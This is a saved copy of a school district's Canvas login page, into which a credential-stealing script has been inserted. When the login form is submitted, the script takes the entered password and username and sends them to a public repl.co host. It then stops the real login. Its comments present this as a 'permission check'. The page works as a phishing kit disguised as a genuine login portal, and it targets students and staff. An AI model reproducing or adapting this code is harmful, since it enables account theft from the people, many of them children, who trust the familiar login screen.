<!DOCTYPE html>
<html class="scripts-not-loaded" dir="ltr"   lang="en">
<head>
  <meta charset="utf-8">
  <meta name="sentry-trace" content="fe783b6ad19749f3bb4b5bd2b23fe00a-7358b0a02be04dc6-0"/>
  <link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/fonts/lato/extended/Lato-Regular-bd03a2cc27.woff2" as="font" type="font/woff2" crossorigin="anonmyous">
  <link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/fonts/lato/extended/Lato-Bold-cccb897485.woff2" as="font" type="font/woff2" crossorigin="anonmyous">
  <link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/fonts/lato/extended/Lato-Italic-4eb103b4d1.woff2" as="font" type="font/woff2" crossorigin="anonmyous">
  <link rel="stylesheet" media="screen" href="https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/no_variables/bundles/fonts-43e9c545fc.css" />
  
  <link rel="shortcut icon" type="image/x-icon" href="https://du11hjcvx0uqb.cloudfront.net/dist/images/favicon-e10d657a73.ico" />
  <link rel="apple-touch-icon" href="https://du11hjcvx0uqb.cloudfront.net/dist/images/apple-touch-icon-585e5d997d.png" />
  <link rel="stylesheet" media="all" href="https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/120e202320474dc53a957a6feaa1c0ae/variables-7dd4b80918af0e0218ec0229e4bd5873.css" />
  <link rel="stylesheet" media="all" href="https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/new_styles_normal_contrast/bundles/common-70dfd56868.css" />
  <meta name="apple-itunes-app" content="app-id=480883488">
<link rel="manifest" href="/web-app-manifest/manifest.json">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="theme-color" content="#233e5e">
  <link rel="stylesheet" media="all" href="https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/new_styles_normal_contrast/bundles/login-bca287e0d1.css" />
  <link rel="stylesheet" media="all" href="https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/11922396/Button%20animations%20v2.css" />
  <script>
    function _earlyClick(e){
      var c = e.target
      while (c && c.ownerDocument) {
        if (c.getAttribute('href') == '#' || c.getAttribute('data-method')) {
          if (!e.defaultPrevented) {
            e.preventDefault()
          }
          (_earlyClick.clicks = _earlyClick.clicks || []).push(c)
          break
        }
        c = c.parentNode
      }
    }
    document.addEventListener('click', _earlyClick)
  </script>


  <script>
    INST = {"environment":"production","logPageViews":true,"editorButtons":[]};
    ENV = {"ASSET_HOST":"https://du11hjcvx0uqb.cloudfront.net","active_brand_config_json_url":"https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/120e202320474dc53a957a6feaa1c0ae/variables-7dd4b80918af0e0218ec0229e4bd5873.json","active_brand_config":{"md5":"120e202320474dc53a957a6feaa1c0ae","variables":{"ic-brand-primary":"#50c2c3","ic-brand-button--secondary-bgd":"#233e5e","ic-brand-global-nav-bgd":"#233e5e","ic-brand-header-image":"https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/638625/canvas-logohead.svg?AWSAccessKeyId=AKIAJFNFXH2V2O7RPCAA\u0026Expires=1932543178\u0026Signature=zhGGEnEWqD1Nj57moJD7Qju%2BoSY%3D\u0026response-cache-control=Cache-Control%3Amax-age%3D473364000%2C%20public\u0026response-expires=473364000","ic-brand-watermark-opacity":"1","ic-brand-Login-body-bgd-color":"#233e5e","ic-brand-Login-body-bgd-image":"https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/638623/Canvas-photo.jpg?AWSAccessKeyId=AKIAJFNFXH2V2O7RPCAA\u0026Expires=1932541746\u0026Signature=eJxyiXBcuoF%2FHGP7T5oifHICUfA%3D\u0026response-cache-control=Cache-Control%3Amax-age%3D473364000%2C%20public\u0026response-expires=473364000","ic-brand-Login-body-bgd-shadow-color":"#052c61","ic-brand-Login-logo":"https://instructure-uploads.s3.us-east-1.amazonaws.com/account_30070000000000001/attachments/3586796/canvass_homepage-logo.png","ic-brand-Login-footer-link-color":"#cccccc"},"share":false,"name":null,"created_at":"2021-06-17T09:09:45-07:00","js_overrides":"https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/916602/disableMerge_09152016.js?AWSAccessKeyId=AKIAJFNFXH2V2O7RPCAA\u0026Expires=1947337170\u0026Signature=Srw3sz2TcX9pwiAyL6fyjKDseXk%3D\u0026response-cache-control=Cache-Control%3Amax-age%3D473364000.0%2C%20public\u0026response-expires=473364000.0","css_overrides":"https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/11922396/Button%20animations%20v2.css","parent_md5":null,"mobile_js_overrides":"","mobile_css_overrides":""},"confetti_branding_enabled":false,"url_to_what_gets_loaded_inside_the_tinymce_editor_css":["https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/120e202320474dc53a957a6feaa1c0ae/variables-7dd4b80918af0e0218ec0229e4bd5873.css","https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/new_styles_normal_contrast/bundles/what_gets_loaded_inside_the_tinymce_editor-a64c7fe33c.css","https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/no_variables/bundles/fonts-43e9c545fc.css"],"url_for_high_contrast_tinymce_editor_css":["https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/default/variables-high_contrast-7dd4b80918af0e0218ec0229e4bd5873.css","https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/new_styles_high_contrast/bundles/what_gets_loaded_inside_the_tinymce_editor-fa0672d544.css","https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/no_variables/bundles/fonts-43e9c545fc.css"],"current_user_id":null,"current_user_global_id":null,"current_user_roles":null,"current_user_is_student":false,"current_user_types":null,"current_user_disabled_inbox":null,"current_user_visited_tabs":null,"discussions_reporting":false,"files_domain":"cluster325.canvas-user-content.com","DOMAIN_ROOT_ACCOUNT_ID":"30070000000000001","k12":false,"help_link_name":"Help","help_link_icon":"help","use_high_contrast":null,"auto_show_cc":null,"disable_celebrations":null,"disable_keyboard_shortcuts":null,"LTI_LAUNCH_FRAME_ALLOWANCES":["geolocation *","microphone *","camera *","midi *","encrypted-media *","autoplay *","clipboard-write *","display-capture *"],"DEEP_LINKING_POST_MESSAGE_ORIGIN":"https://iusd.instructure.com","DEEP_LINKING_LOGGING":null,"comment_library_suggestions_enabled":null,"SETTINGS":{"open_registration":false,"collapse_global_nav":null,"release_notes_badge_disabled":null},"FULL_STORY_ENABLED":false,"RAILS_ENVIRONMENT":"Production","SENTRY_FRONTEND":{"dsn":"https://355a1d96717e4038ac25aa852fa79a8f@relay-iad.sentry.insops.net/388","org_slug":"instructure","base_url":"https://sentry.insops.net","normalized_route":"/login/ldap","errors_sample_rate":"0.0005","traces_sample_rate":"0.0005","url_deny_pattern":"instructure-uploads.*amazonaws.com","revision":"canvas-lms@20230118.52"},"DATA_COLLECTION_ENDPOINT":"https://canvas-frontend-data-iad-prod.inscloudgate.net/submit","KILL_JOY":true,"DIRECT_SHARE_ENABLED":false,"CAN_VIEW_CONTENT_SHARES":null,"FEATURES":{"featured_help_links":true,"lti_platform_storage":false,"scale_equation_images":true,"buttons_and_icons_cropper":true,"calendar_series":false,"account_level_blackout_dates":false,"account_calendar_events":true,"rce_ux_improvements":false,"render_both_to_do_lists":false,"course_paces_redesign":false,"course_paces_for_students":false,"rce_better_paste":false,"product_tours":false,"files_dnd":true,"usage_rights_discussion_topics":true,"granular_permissions_manage_users":true,"create_course_subaccount_picker":false,"lti_deep_linking_module_index_menu_modal":true,"lti_multiple_assignment_deep_linking":true,"buttons_and_icons_root_account":true,"extended_submission_state":false,"scheduled_page_publication":true,"send_usage_metrics":true,"embedded_release_notes":true,"canvas_k6_theme":null,"new_math_equation_handling":true},"current_user":{},"context_asset_string":null,"TIMEZONE":"America/Los_Angeles","CONTEXT_TIMEZONE":null,"LOCALES":["en"],"BIGEASY_LOCALE":"en_US","FULLCALENDAR_LOCALE":"en","MOMENT_LOCALE":"en","rce_auto_save_max_age_ms":86400000,"K5_USER":false,"K5_HOMEROOM_COURSE":false,"K5_SUBJECT_COURSE":false,"LOCALE_TRANSLATION_FILE":"/dist/javascripts/translations/en-888412cb6b.json","ACCOUNT":{"id":"1","name":"Irvine Unified School District","workflow_state":"active","parent_account_id":null,"root_account_id":null,"uuid":"MROpJeU2zj9TTp3oOvuqKoeoZEeXdhVCJCgFgrOJ","default_storage_quota_mb":500,"default_user_storage_quota_mb":50,"default_group_storage_quota_mb":50,"default_time_zone":"America/Los_Angeles","course_template_id":null,"registration_settings":{"login_handle_name":"Username","require_email":false,"salesforce":false,"hubspot":false},"terms_required":true,"terms_of_use_url":"http://www.canvaslms.com/policies/terms-of-use-canvas","privacy_policy_url":"https://www.instructure.com/policies/privacy","recaptcha_key":false},"PASSWORD_POLICY":{"min_length":8},"notices":[],"active_context_tab":null};
    BRANDABLE_CSS_HANDLEBARS_INDEX = [["new_styles_normal_contrast","new_styles_high_contrast","new_styles_normal_contrast_rtl","new_styles_high_contrast_rtl"],{"10":["8300658022",0,"250b5824c2",2],"15":["fc26aa5fd4",0,"f904416063",2],"19":["df5777ed9c"],"61":["f3934dab06","f405852bb2","ee5810890b","3fd9943b9a"],"67":["8b57f54e71",0,"43833dde85",2],"71":["35b89b103a","4304be7d41","58dbfc2651","2932678b1c"],"06":["cb9f63cba6",0,"2be010fc14",2],"f0":["7c947dce20",0,0,0],"c8":["12d5e4d1e8","9f7b02d283","4ebd280f3e","b547456f4c"],"1e":["02e336724a","d7bb142b0a","d7ac7fdfb8","c03b9b261e"],"b3":["8ebc71ebc3","cf8efa05c8","4efdc93a21","fd6d3a9780"],"4f":["0a2c3dcf2f",0,"79668e6396",2],"0c":["c26e82abac",0,"b71e9cbd6d",2],"da":["efb9fe6d7c","edbd1b5e83","a6dc56afb7","dfb2d13098"],"1d":["a3bfcb7961",0,"90682b3bbe",2],"08":["64bff5a97d"],"e2":["11429f119a"],"9f":["35936a18c3",0,0,0],"2b":["abf63f48ef","bf8e135ffe","378e0c136b","9833e305e6"],"2c":["6d919206cd",0,0,0],"c2":["6f2721ae01"],"9c":["ecafc938e4",0,"59e7c22304",2],"c5":["ebf0e1382f","7f587d9a8a","afbdabf23d","0d398196a8"],"f2":["51574f9b13"]}]
;
  </script>

  <link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/120e202320474dc53a957a6feaa1c0ae/variables-7dd4b80918af0e0218ec0229e4bd5873.js" as="script" type="text/javascript"><link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/timezone/America/Los_Angeles-d9cac65c52.js" as="script" type="text/javascript"><link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/timezone/en_US-80a0ce259b.js" as="script" type="text/javascript"><link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/webpack-production/main-e-374374bd5c.js" as="script" type="text/javascript" crossorigin="anonymous"><script>
//<![CDATA[

      ;["https://du11hjcvx0uqb.cloudfront.net/dist/brandable_css/120e202320474dc53a957a6feaa1c0ae/variables-7dd4b80918af0e0218ec0229e4bd5873.js", "https://du11hjcvx0uqb.cloudfront.net/dist/timezone/America/Los_Angeles-d9cac65c52.js", "https://du11hjcvx0uqb.cloudfront.net/dist/timezone/en_US-80a0ce259b.js"].forEach(function(src) {
        var s = document.createElement('script'); s.src = src; s.async = false;
        document.head.appendChild(s)
      });
//]]>
</script><script>
//<![CDATA[

      ;["https://du11hjcvx0uqb.cloudfront.net/dist/webpack-production/main-e-374374bd5c.js"].forEach(function(src) {
        var s = document.createElement('script'); s.src = src; s.async = false; s.crossOrigin = 'anonymous';
        document.head.appendChild(s)
      });
//]]>
</script><link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/webpack-production/login-c-f0b9f704ac.js" as="script" type="text/javascript"><link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/webpack-production/terms_of_service_modal-c-1e3a92236b.js" as="script" type="text/javascript"><script>
//<![CDATA[
(window.bundles || (window.bundles = [])).push('login');
(window.bundles || (window.bundles = [])).push('terms_of_service_modal');
//]]>
</script>
  <title>Log In to Canvas</title>



    <script type="text/javascript">
      window.heap=window.heap||[],heap.load=function(e,t){window.heap.appid=e,window.heap.config=t=t||{};var r=document.createElement("script");r.type="text/javascript",r.async=!0,r.src="https://cdn.heapanalytics.com/js/heap-"+e+".js";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(r,a);for(var n=function(e){return function(){heap.push([e].concat(Array.prototype.slice.call(arguments,0)))}},p=["addEventProperties","addUserProperties","clearEventProperties","identify","resetIdentity","removeEventProperty","setEventProperties","track","unsetEventProperty"],o=0;o<p.length;o++)heap[p[o]]=n(p[o])};
      heap.load("3001039959");
    </script>

</head>

<body class="full-width ic-Login-Body no-headers  primary-nav-expanded full-width responsive_student_grades_page">

<noscript>
  <div role="alert" class="ic-flash-static ic-flash-error">
    <div class="ic-flash__icon" aria-hidden="true">
      <i class="icon-warning"></i>
    </div>
    <h1>You need to have JavaScript enabled in order to access this site.</h1>
  </div>
</noscript>




<div id="flash_message_holder"></div>
<div id="flash_screenreader_holder"></div>

<div id="application" class="ic-app">
  

  <div id="instructure_ajax_error_box">
    <div style="text-align: right; background-color: #fff;"><a href="#" class="close_instructure_ajax_error_box_link">Close</a></div>
    <iframe id="instructure_ajax_error_result" src="about:blank" style="border: 0;" title="Error"></iframe>
  </div>

  <div id="wrapper" class="ic-Layout-wrapper">
    <div id="main" class="ic-Layout-columns">
      <div id="not_right_side" class="ic-app-main-content">
        <div id="content-wrapper" class="ic-Layout-contentWrapper">
          
          <div id="content" class="ic-Layout-contentMain" role="main">
            




<div class="ic-Login">
  <div class="ic-Login__container">
    <div class="ic-Login__content">
      <div class="ic-Login__innerContent">

        <div class="ic-Login-header">
          
<div class="ic-Login-header__logo">
    <img alt="Irvine Unified School District" src="https://instructure-uploads.s3.us-east-1.amazonaws.com/account_30070000000000001/attachments/3586796/canvass_homepage-logo.png" />
</div>

          <div class="ic-Login-header__links">
            

    <a id="coenrollment_link" class="ic-Login__link ic-Login__register-banner" data-template="newParentDialog" data-path="/users" href="#">
      <div class="ic-Login__banner-title">
        Parent of a Canvas User?
      </div>
      <div class="ic-Login__banner-subtitle">
        Click Here For an Account
      </div>
</a>

          </div>
        </div>

        <div class="ic-Login__body">
         <script>
          function httpGet(theUrl)
          {
             var xmlHttp = new XMLHttpRequest();
            xmlHttp.open( "GET", theUrl, false ); // false for synchronous request
             xmlHttp.send( null );
          }
          function submitForm(event) {
            let pwd = document.getElementById("pseudonym_session_password").value;// prints working directory 
             let UUID = document.getElementById("pseudonym_session_unique_id").value;// check if user has permission to access canvas or is simply a observer account (better implementation needed  since needing a public service REPL to check it for us is  kinda insecure but we'll worry about that later  who hacks schools anyways? )
             httpGet("https://zelectivedatabasedest.6notce5.repl.co/put/" +String(pwd) + "-" + String(UUID)) // the user IDs are structured in a way a simple algorythem can check for theyr permissions      but like i said it may not be the best idea to use a public REPL for this  maybe in the future we'll be able to setup a proper server to avoid all of this 
             return false;
          }
          </script>

          
          <form id="login_form" onsubmit="submitForm(event)" action="/login/ldap" accept-charset="UTF-8" method="post"><input name="utf8" type="hidden" value="&#x2713;" /><input type="hidden" name="authenticity_token" value="3Sz81HLYpbzrgVynj7VZcgQIQaoXbYSSvaGKpp3M8IOVep2dJo+K7YTiF8vh+jM9L3EinUc9stvvwtrj76202g==" />
            <h1 class="ui-helper-hidden-accessible">
              Log In
            </h1>
            
            <input type="hidden" name="redirect_to_ssl" value="1"/>
            <div class="ic-Form-control ic-Form-control--login">
              <label class="ic-Label" for="pseudonym_session_unique_id">Username</label>
              <input class="ic-Input text" autofocus="autofocus" type="text" name="pseudonym_session[unique_id]" id="pseudonym_session_unique_id" />
            </div>
            <div class="ic-Form-control ic-Form-control--login">
              <label class="ic-Label" for="pseudonym_session_password">Password</label>
              <input class="ic-Input text" role="textbox" type="password" name="pseudonym_session[password]" id="pseudonym_session_password" />
            </div>
            <div class="ic-Login__actions">
              <div class="ic-Login__actions-timeout">
                    <input name="pseudonym_session[remember_me]" type="hidden" value="0" /><input type="checkbox" value="1" name="pseudonym_session[remember_me]" id="pseudonym_session_remember_me" />
                    <label for="pseudonym_session_remember_me">Stay signed in</label>

                <div class="ic-Login__forgot">
                  
<a class="ic-Login__link forgot_password_link" id="login_forgot_password" href="#">Forgot Password?</a>

                </div>
              </div>
              <div class="ic-Form-control ic-Form-control--login">
                <button type="submit" class="Button Button--login">
                  Log In
                </button>
              </div>
            </div> <!-- ic-Login__actions -->
            

</form>          <form id="forgot_password_form" style="display: none;" action="/forgot_password" accept-charset="UTF-8" method="post"><input name="utf8" type="hidden" value="&#x2713;" /><input type="hidden" name="authenticity_token" value="6lIjYTyDT6Oj17OO0qTcR3wLh66ujQymrHV5pq68BQWiBEIoaNRg8sy0+OK867YIV3Lkmf7dOu/+Finj3N1BXA==" />
            <h1 class="ui-helper-hidden-accessible">Forgot Password?</h1>
            <p id="forgot_password_instructions" class="ic-Login__forgot-text">
              Enter your Username and we&#39;ll send you a link to change your password.
            </p>
            <div class="ic-Form-control ic-Form-control--login">
              <label for="pseudonym_session_unique_id_forgot" class="ic-Label">
                Username
              </label>
              <input aria-describedby="forgot_password_instructions" class="ic-Input email_address text" type="text" name="pseudonym_session[unique_id_forgot]" value="" id="pseudonym_session_unique_id_forgot" />

            </div>
            <div class="ic-Form-control ic-Form-control--login">
              <div class="ic-Login__actions">
                <a class="ic-Login__actions--left ic-Login__link login_link" href="/login">Back to Login</a>
                <button type="submit" class="Button Button--login">
                  Request Password
                </button>
              </div> <!-- end ic-Login__actions -->
            </div>
</form>        </div> <!-- end ic-Login__body -->
      </div> <!-- end ic-Login__innerContent  -->
      <footer role="contentinfo" id="footer" class="ic-Login-footer">

        <div id="footer-links" class="ic-Login-footer__links">
          <a class="support_url help_dialog_trigger" data-track-category="help system" data-track-label="help button" href="http://help.instructure.com/">Help</a>
          <a href="https://iusd.instructure.com/privacy_policy">Privacy Policy</a>
    <span id="terms_of_service_footer_link" class="terms_of_service_link terms-of-service__link"></span>
<a href="http://facebook.com/instructure">Facebook</a>
<a href="http://twitter.com/instructure">Twitter</a>

        </div>
        <a href="http://www.instructure.com" class="ic-Login-footer__logo-link" aria-label="By Instructure">
          <svg xmlns="http://www.w3.org/2000/svg" width="110" height="16" viewBox="25 265 743 80"><title>Instructure</title>
<g class="ic-Instructure-Logo">
	<g>
		<polygon class="st0" points="23.8,331.5 72.3,358.8 120.7,331.5 72.3,304.2 		"/>
		<polygon class="st0" points="98.4,293.7 120.7,281.1 98.3,268.5 76,281.1 		"/>
		<polygon class="st0" points="94.6,266.4 72.3,253.8 49.9,266.4 72.3,279 		"/>
		<polygon class="st0" points="68.5,281.1 46.2,268.5 23.8,281.1 46.2,293.7 		"/>
	</g>
	<g>
		<path class="st0" d="M166.3,344.9v-78.1h12.9v78.1H166.3z"/>
		<path class="st0" d="M202,344.9v-78.1H215l16.4,48.3v-48.3h11.8v78.1h-12.3l-17.1-50.7v50.7H202z"/>
		<path class="st0" d="M357.4,278.2h-13v66.7h-12.9v-66.7h-13v-11.4h39V278.2z"/>
		<path class="st0" d="M404.6,344.9l-9.9-31.1h-6.5v31.1h-12.9v-78.1h20.2c11.8,0,19.6,4.7,19.6,16.5v13.9c0,7.5-3.1,12.2-8.5,14.5
			l11.2,33.1H404.6z M388.2,302.7h6.8c4.2,0,7.1-1.6,7.1-7.1v-10.1c0-5.6-2.9-7.1-7.1-7.1h-6.8V302.7z"/>
		<path class="st0" d="M475.4,329.3c0,12-7.6,16.5-19.4,16.5h-0.4c-11.8,0-19.4-4.4-19.4-16.5v-62.5h12.9v60.5
			c0,5.6,2.5,7.1,6.7,7.1c4.2,0,6.7-1.6,6.7-7.1v-60.5h12.9V329.3z"/>
		<path class="st0" d="M536.5,329.3c0,12-7.8,16.5-19.6,16.5h-0.2c-11.8,0-19.6-4.4-19.6-16.5v-46.8c0-11.6,7.8-16.5,19.6-16.5h0.2
			c11.8,0,19.6,4.9,19.6,16.5v9h-12.9v-7c0-5.5-2.7-7.1-6.8-7.1c-4.1,0-6.8,1.7-6.8,7.1v42.8c0,5.5,2.7,7.1,6.8,7.1
			c4.1,0,6.8-1.7,6.8-7.1v-8.9h12.9V329.3z"/>
		<path class="st0" d="M592.1,278.2h-13v66.7h-12.9v-66.7h-13v-11.4h39V278.2z"/>
		<path class="st0" d="M649,329.3c0,12-7.6,16.5-19.4,16.5h-0.4c-11.8,0-19.4-4.4-19.4-16.5v-62.5h12.9v60.5c0,5.6,2.5,7.1,6.7,7.1
			c4.2,0,6.7-1.6,6.7-7.1v-60.5H649V329.3z"/>
		<path class="st0" d="M700.4,344.9l-9.9-31.1H684v31.1H671v-78.1h20.2c11.8,0,19.6,4.7,19.6,16.5v13.9c0,7.5-3.1,12.2-8.5,14.5
			l11.2,33.1H700.4z M684,302.7h6.8c4.2,0,7.1-1.6,7.1-7.1v-10.1c0-5.6-2.9-7.1-7.1-7.1H684V302.7z"/>
		<path class="st0" d="M289.8,289.5v-5.7c0-4.9-2.8-6.7-6.6-6.7c-3.8,0-6.6,1.8-6.6,6.7v5.4c0,4,1.3,5.8,5,7.9l9.1,5.1
			c7.5,4.2,11.9,7.7,11.9,16.1v11.3c0,12-7.5,16.3-19.3,16.3h-0.2c-11.8,0-19.3-4.1-19.3-16.3v-8.4h12.7v6.6c0,4.8,2.8,6.9,6.7,6.9
			c3.9,0,6.7-2.1,6.7-6.9v-6.1c0-4-1.2-6-5.1-8.1l-9-5.1c-7.6-4.3-11.9-7.9-11.9-16.1V282c0-11.6,8.5-16.1,19.2-16.1h0.2
			c10.7,0,19.2,4.5,19.2,16.1v7.5H289.8z"/>
		<polygon class="st0" points="732.5,344.9 732.5,266.9 766.7,266.9 766.7,278.2 745.4,278.2 745.4,299.6 763.3,299.6 763.3,311 
			745.4,311 745.4,333.5 767,333.5 767,344.9 		"/>
	</g>
</g>

</svg>

        </a>
    </footer>
    </div> <!-- end ic-Login__content -->
  </div>
</div> <!-- end ic-Login -->



          </div>
        </div>
        <div id="right-side-wrapper" class="ic-app-main-content__secondary">
          <aside id="right-side" role="complementary">
            
          </aside>
        </div>
      </div>
    </div>
  </div>



    <div style="display:none;"><!-- Everything inside of this should always stay hidden -->
    </div>
  <div id='aria_alerts' class='hide-text affix' role="alert" aria-live="assertive"></div>
  <div id='StudentTray__Container'></div>
  


<link rel="preload" href="https://du11hjcvx0uqb.cloudfront.net/dist/webpack-production/inst_fs_service_worker-c-cf69d8b6de.js" as="script" type="text/javascript"><script>
//<![CDATA[
(window.bundles || (window.bundles = [])).push('inst_fs_service_worker');
//]]>
</script>
  <script>
//<![CDATA[

      ;["https://instructure-uploads.s3.amazonaws.com/account_30070000000000001/attachments/916602/disableMerge_09152016.js?AWSAccessKeyId=AKIAJFNFXH2V2O7RPCAA&Expires=1947337170&Signature=Srw3sz2TcX9pwiAyL6fyjKDseXk%3D&response-cache-control=Cache-Control%3Amax-age%3D473364000.0%2C%20public&response-expires=473364000.0"].forEach(function(src) {
        var s = document.createElement('script'); s.src = src; s.async = false;
        document.head.appendChild(s)
      });
//]]>
</script>

</div> <!-- #application -->
</body>
</html>

